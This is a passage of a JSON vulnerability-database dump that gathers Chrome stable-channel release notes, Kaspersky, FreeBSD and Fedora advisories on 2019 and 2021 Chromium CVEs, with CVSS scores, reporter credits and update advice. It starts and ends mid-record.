CVE-2021-21180: Use after free in tab search. Reported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability Research on 2021-02-07\n\n[$TBD][[1177875](<https://crbug.com/1177875>)] Medium CVE-2020-27844: Heap buffer overflow in OpenJPEG. Reported by Sean Campbell at Tableau on 2021-02-12\n\n[$TBD][[1182767](<https://crbug.com/1182767>)] Medium CVE-2021-21181: Side-channel information leakage in autofill. Reported by Xu Lin (University of Illinois at Chicago), Panagiotis Ilia (University of Illinois at Chicago), Jason Polakis (University of Illinois at Chicago) on 2021-02-26\n\n[$1000][[1049265](<https://crbug.com/1049265>)] Low CVE-2021-21182: Insufficient policy enforcement in navigations. 
Reported by Luan Herrera (@lbherrera_) on 2020-02-05\n\n[$1000][[1105875](<https://crbug.com/1105875>)] Low CVE-2021-21183: Inappropriate implementation in performance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on 2020-07-15\n\n[$1000][[1131929](<https://crbug.com/1131929>)] Low CVE-2021-21184: Inappropriate implementation in performance APIs. Reported by James Hartig on 2020-09-24\n\n[$TBD][[1100748](<https://crbug.com/1100748>)] Low CVE-2021-21185: Insufficient policy enforcement in extensions. Reported by David Erceg on 2020-06-30\n\n[$TBD][[1153445](<https://crbug.com/1153445>)] Low CVE-2021-21186: Insufficient policy enforcement in QR scanning. Reported by dhirajkumarnifty on 2020-11-28\n\n[$TBD][[1155516](<https://crbug.com/1155516>)] Low CVE-2021-21187: Insufficient data validation in URL formatting. Reported by Kirtikumar Anandrao Ramchandani on 2020-12-04\n\n[$N/A][[1161739](<https://crbug.com/1161739>)] Low CVE-2021-21188: Use after free in Blink. Reported by Woojin Oh(@pwn_expoit) of STEALIEN on 2020-12-24\n\n[$TBD][[1165392](<https://crbug.com/1165392>)] Low CVE-2021-21189: Insufficient policy enforcement in payments. Reported by Khalil Zhani on 2021-01-11\n\n[$TBD][[1166091](<https://crbug.com/1166091>)] Low CVE-2021-21190: Uninitialized Use in PDFium. Reported by Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on 2021-01-13\n\n[$NA][[1164816](<https://crbug.com/1164816>)] Low CVE-2021-21200: Inappropriate implementation in Settings. Reported by Lucas Pinheiro, Microsoft Browser Vulnerability Research on 2021-01-11\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\n\n\nGoogle is aware of reports that an exploit for CVE-2021-21166 exists in the wild. 
\n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[1183883](<https://crbug.com/1183883>)] Various fixes from internal audits, fuzzing and other initiatives\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\nPrudhvikumar Bommana\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", 
"CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21200"], "modified": "2021-03-02T00:00:00", "id": "GCSA-3803715665928870837", "href": "https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-12-30T22:31:56", "description": "The stable channel has been updated to 78.0.3904.87 for Windows, Mac, and Linux, which will roll out over the coming days/weeks. \n\n\n\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [2](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-1-M78>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$7500][[1013868](<https://crbug.com/1013868>)] High CVE-2019-13721: Use-after-free in PDFium. Reported by banananapenguin on 2019-10-12\n\n[$TBD][[1019226](<https://crbug.com/1019226>)] High CVE-2019-13720: Use-after-free in audio. 
Reported by Anton Ivanov and Alexey Kulaev at Kaspersky Labs on 2019-10-29\n\n\n\n\nGoogle is aware of reports that an exploit for CVE-2019-13720 exists in the wild.\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\n\n\n\n\n\n\n\n\nA list of all changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/78.0.3904.70..78.0.3904.87?pretty=fuller&n=10000>). Interested in switching release channels? [ Find out how](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\n\n\n\n\n\n\nSrinivas Sista \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-31T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-10-31T00:00:00", "id": "GCSA-4512841020680293434", "href": "https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2021-08-18T10:57:43", "description": "### *Detect date*:\n03/04/2021\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browser. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, bypass security restrictions, spoof user interface, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Edge (Chromium-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-21190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21190>) \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21184>) \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21189>) \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21159>) \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21174>) \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21175>) \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21169>) \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21163>) \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21178>) \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21166>) 
\n[CVE-2021-21171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21171>) \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21164>) \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-27844>) \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21160>) \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21188>) \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21173>) \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21182>) \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21165>) \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21183>) \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21161>) \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21167>) \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21177>) \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21176>) \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21180>) \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21170>) \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21172>) \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21179>) \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21181>) \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21186>) 
\n[CVE-2021-21162](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21162>) \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21185>) \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21187>) \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2021-21168>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Edge](<https://threats.kaspersky.com/en/product/Microsoft-Edge/>)\n\n### *CVE-IDS*:\n[CVE-2020-27844](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27844>)8.3Critical \n[CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>)6.8High \n[CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)6.8High \n[CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)6.8High \n[CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)6.8High \n[CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)4.3Warning \n[CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21164>)4.3Warning \n[CVE-2021-21165](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21165>)6.8High \n[CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)6.8High \n[CVE-2021-21167](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21167>)6.8High \n[CVE-2021-21168](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21168>)4.3Warning \n[CVE-2021-21169](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21169>)6.8High \n[CVE-2021-21170](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21170>)4.3Warning \n[CVE-2021-21171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21171>)4.3Warning \n[CVE-2021-21172](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21172>)5.8High 
\n[CVE-2021-21173](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21173>)4.3Warning \n[CVE-2021-21174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21174>)6.8High \n[CVE-2021-21175](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21175>)4.3Warning \n[CVE-2021-21176](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21176>)4.3Warning \n[CVE-2021-21177](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21177>)4.3Warning \n[CVE-2021-21178](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21178>)4.3Warning \n[CVE-2021-21179](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21179>)6.8High \n[CVE-2021-21180](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21180>)6.8High \n[CVE-2021-21181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21181>)4.3Warning \n[CVE-2021-21182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21182>)4.3Warning \n[CVE-2021-21183](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21183>)4.3Warning \n[CVE-2021-21184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21184>)4.3Warning \n[CVE-2021-21185](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21185>)4.3Warning \n[CVE-2021-21186](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21186>)4.3Warning \n[CVE-2021-21187](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21187>)4.3Warning \n[CVE-2021-21188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21188>)6.8High \n[CVE-2021-21189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21189>)4.3Warning \n[CVE-2021-21190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21190>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "kaspersky", "title": "KLA12107 Multiple vulnerabilities in Microsoft Browser", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-03-10T00:00:00", "id": "KLA12107", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12107/", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-08-18T11:05:00", "description": "### *Detect date*:\n11/14/2019\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Opera. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nOpera earlier than 65.0.3467.38\n\n### *Solution*:\nUpdate to the latest version \n[Download Opera](<https://www.opera.com>)\n\n### *Original advisories*:\n[Changelog for 65](<https://blogs.opera.com/desktop/changelog-for-65/#b3467.38>) \n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Opera](<https://threats.kaspersky.com/en/product/Opera/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)6.8High \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-14T00:00:00", "type": "kaspersky", "title": "KLA11716 Multiple vulnerabilities in Opera", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2020-06-18T00:00:00", "id": "KLA11716", "href": 
"https://threats.kaspersky.com/en/vulnerability/KLA11716/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:07:08", "description": "### *Detect date*:\n10/31/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 78.0.3904.87\n\n### *Solution*:\nUpdate to the latest version \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)6.8High \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-31T00:00:00", "type": "kaspersky", "title": "KLA11601 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2020-06-18T00:00:00", "id": "KLA11601", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11601/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nChrome Releases reports:\n\nThis release includes 47 security fixes, including the below.\n\t Google is aware of reports that an exploit for CVE-2021-21166 exists\n\t in the wild. Please see URL for details.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", 
"CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-03-02T00:00:00", "id": "F00B65D8-7CCB-11EB-B3BE-E09467587C17", "href": "https://vuxml.freebsd.org/freebsd/f00b65d8-7ccb-11eb-b3be-e09467587c17.html", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-05T00:18:43", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: chromium-89.0.4389.90-3.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2021-04-05T00:18:43", "id": "FEDORA:BF4FC30A0346", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LCIDZ77XUDMB2EBPPWCQXPEIJERDNSNT/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-01T01:51:39", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-89.0.4389.90-3.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 